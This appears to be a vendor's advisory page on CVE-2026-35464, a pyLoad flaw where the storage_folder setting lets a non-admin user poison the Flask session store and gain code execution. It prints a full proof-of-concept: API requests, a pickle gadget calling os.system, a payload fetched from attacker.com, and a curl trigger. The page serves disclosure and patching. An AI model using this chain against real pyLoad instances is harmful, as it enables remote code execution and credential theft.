Get a Demo

Let's Patch It!

Book a short call with one our specialists, we'll walk you through how Endor Patches work, and ask you a few questions about your environment (like your primary programming languages and repository management). We'll also send you an email right after you fill out the form, feel free to reply with any questions you have in advance!

CVE

CVE-2026-35464

pyLoad: Unprotected storage_folder enables arbitrary file write to Flask session store and code execution (Incomplete fix for CVE-2026-33509)
Back to all
CVE

CVE-2026-35464

pyLoad: Unprotected storage_folder enables arbitrary file write to Flask session store and code execution (Incomplete fix for CVE-2026-33509)

Summary

The fix for CVE-2026-33509 (GHSA-r7mc-x6x7-cqxx) added an ADMINONLYOPTIONS set to block non-admin users from modifying security-critical config options. The storage_folder option is not in this set and passes the existing path restriction because the Flask session directory is outside both PKGDIR and userdir. A user with SETTINGS and ADD permissions can redirect downloads to the Flask filesystem session store, plant a malicious pickle payload as a predictable session file, and trigger arbitrary code execution when any HTTP request arrives with the corresponding session cookie.

Required Privileges

The chain requires a single non-admin user with both SETTINGS (to change storage_folder) and ADD (to submit a download URL) permissions. These are independent bitmask flags that can be assigned together by an admin. The final RCE trigger is unauthenticated: any HTTP request with the crafted session cookie causes deserialization.

Root Cause

storage_folder at src/pyload/core/api/init.py:238-246 has a path check that blocks writing inside PKGDIR or userdir using os.path.realpath. However, Flask's filesystem session directory (/tmp/pyLoad/flask/ in the standard Docker deployment) is outside both restricted paths.

pyload configures Flask with SESSION_TYPE = "filesystem" at init.py:127. The cachelib FileSystemCache stores session files as md5("session:" + session_id) and deserializes them with pickle.load() on every request that carries the corresponding session cookie.

Proven RCE Chain

Tested against lscr.io/linuxserver/pyload-ng:latest Docker image.

Step 1 — Change download directory to Flask session store:

    POST /api/setconfigvalue

    {"section":"core","category":"general","option":"storage_folder","value":"/tmp/pyLoad/flask"}

The path check resolves /tmp/pyLoad/flask/ via realpath. It does not start with PKGDIR (/lsiopy/.../pyload/) or userdir (/config/). Check passes.

Step 2 — Compute the target session filename:

    md5("session:ATTACKERSESSIONID") = 92912f771df217fb6fbfded6705dd47c

Flask-Session uses cachelib which stores files as md5(keyprefix + sessionid). The default key prefix is session:.

Step 3 — Host and download the malicious pickle payload:

    import pickle, os, struct

    class RCE:

        def reduce(self):

            return (os.system, ("id > /tmp/pyload-rce-success",))

    session = {"_permanent": True, "rce": RCE()}

    payload = struct.pack("I", 0) + pickle.dumps(session, protocol=2)

    # struct.pack("I", 0) = cachelib timeout header (0 = never expires)

Serve as http://attacker.com/92912f771df217fb6fbfded6705dd47c and submit:

    POST /api/add_package

    {"name":"x","links":["http://attacker.com/92912f771df217fb6fbfded6705dd47c"],"dest":1}

The file is saved to /tmp/pyLoad/flask/92912f771df217fb6fbfded6705dd47c.

Step 4 — Trigger deserialization (unauthenticated):

    curl http://target:8000/ -b "pyloadsession8000=ATTACKERSESSIONID"

The session cookie name is pyloadsession + the configured port number (init.py:128).

Flask loads the session file. cachelib reads the 4-byte timeout header, confirms the entry is not expired, and calls pickle.load(). The RCE gadget executes.

Result:

    $ docker exec pyload-poc cat /tmp/pyload-rce-success

    uid=1000(abc) gid=1000(users) groups=1000(users)

Impact

A non-admin user with SETTINGS + ADD permissions achieves arbitrary code execution as the pyload service user. The final trigger requires no authentication. The attacker can:

  • Execute arbitrary commands with the privileges of the pyload process
  • Read environment variables (API keys, credentials)
  • Access the filesystem (download history, user database)
  • Pivot to other network resources

Suggested Fix

Add storage_folder to the ADMIN_ONLY set, or extend the path check to block writing to auto-consumed temporary directories (Flask session store, Jinja bytecode cache, pyload temp directory):

    ADMINONLYOPTIONS = {

        ...

        ("general", "storage_folder"),  # ADDED: prevents session poisoning RCE

        ...

    }

Also correct the existing wrong option names:

    ("webui", "sslcertfile"),  # FIXED: was "sslcert" (dead code)

    ("webui", "sslkeyfile"),   # FIXED: was "sslkey" (dead code)

Package Versions Affected

Package Version
patch Availability
No items found.

Automatically patch vulnerabilities without upgrading

Fix Without Upgrading
Detect compatible fix
Apply safe remediation
Fix with a single pull request

CVSS Version

Severity
Base Score
CVSS Version
Score Vector
C
H
U
7.5
-
3.1
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
C
H
U
0
-
3.1
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
C
H
U
-

Related Resources

No items found.

References

https://github.com/pyload/pyload/security/advisories/GHSA-4744-96p5-mp2j, https://github.com/pyload/pyload/security/advisories/GHSA-r7mc-x6x7-cqxx, https://nvd.nist.gov/vuln/detail/CVE-2026-33509, https://nvd.nist.gov/vuln/detail/CVE-2026-35464, https://github.com/pyload/pyload/commit/c4cf995a2803bdbe388addfc2b0f323277efc0e1, https://github.com/pyload/pyload, https://www.cve.org/CVERecord?id=CVE-2026-33509

Severity

7.5

CVSS Score
0
10

Basic Information

Ecosystem
Base CVSS
7.5
EPSS Probability
0.00076%
EPSS Percentile
0.22834%
Introduced Version
0
Fix Available

Fix Critical Vulnerabilities Instantly

Secure your app without upgrading.
Fix Without Upgrading